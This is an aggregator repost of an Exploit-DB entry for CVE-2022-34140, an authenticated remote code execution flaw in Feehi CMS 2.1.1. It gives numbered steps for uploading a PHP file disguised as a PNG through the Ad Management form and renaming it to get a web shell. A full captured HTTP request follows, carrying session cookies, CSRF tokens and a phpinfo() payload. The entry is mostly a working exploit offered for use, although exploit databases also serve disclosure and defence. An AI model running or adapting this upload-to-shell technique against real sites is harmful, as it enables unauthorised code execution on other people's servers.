5
[webapps] Feehi CMS 2.1.1 - Remote Code Execution (Authenticated)
source link: https://www.exploit-db.com/exploits/51018
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
Feehi CMS 2.1.1 - Remote Code Execution (Authenticated)
# Exploit Title: Feehi CMS 2.1.1 - Remote Code Execution (RCE) (Authenticated)
# Date: 22-08-2022
# Exploit Author: yuyudhn
# Vendor Homepage: https://feehi.com/
# Software Link: https://github.com/liufee/cms
# Version: 2.1.1 (REQUIRED)
# Tested on: Linux, Docker
# CVE : CVE-2022-34140
# Proof of Concept:
1. Login using admin account at http://feehi-cms.local/admin
2. Go to Ad Management menu. http://feehi-cms.local/admin/index.php?r=ad%2Findex
3. Create new Ad. http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
4. Upload php script with jpg/png extension, and using Burp suite or any tamper data browser add ons, change back the extension to php.
5. Shell location: http://feehi-cms.local/uploads/setting/ad/[some_random_id].php
# Burp request example:
POST /admin/index.php?r=ad%2Fcreate HTTP/1.1
Host: feehi-cms.local
Content-Length: 1530
Cache-Control: max-age=0
sec-ch-ua: "Chromium";v="103", ".Not/A)Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://feehi-cms.local
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFBYJ8wfp9LBoF4xg
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.53 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://feehi-cms.local/admin/index.php?r=ad%2Fcreate
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: _csrf=807bee7110e873c728188300428b64dd155c422c1ebf36205f7ac2047eef0982a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22H9zz-zoIIPm7GEDiUGwm81TqyoAb5w0U%22%3B%7D; PHPSESSID=aa1dec72025b1524ae0156d527007e53; BACKEND_FEEHICMS=7f608f099358c22d4766811704a93375; _csrf_backend=3584dfe50d9fe91cfeb348e08be22c1621928f41425a41360b70c13e7c6bd2daa%3A2%3A%7Bi%3A0%3Bs%3A13%3A%22_csrf_backend%22%3Bi%3A1%3Bs%3A32%3A%22jQjzwf12TCyw_BLdszCqpz4zjphcQrmP%22%3B%7D
Connection: close
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="_csrf_backend"
FvaDqWC07mTGiOuZr-Qzyc2NlSACNuyPM4w7qXxTgmZ8p-nTF9LfVpLLku7wpn-tvvfWUXJM2PVZ_FPKLSHvNg==
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[name]"
rce
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[tips]"
rce at Ad management
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[input_type]"
1
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[ad]"; filename="asuka.php"
Content-Type: image/png
<?php phpinfo();
------WebKitFormBoundaryFBYJ8wfp9LBoF4xg
Content-Disposition: form-data; name="AdForm[link]"
--------------
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK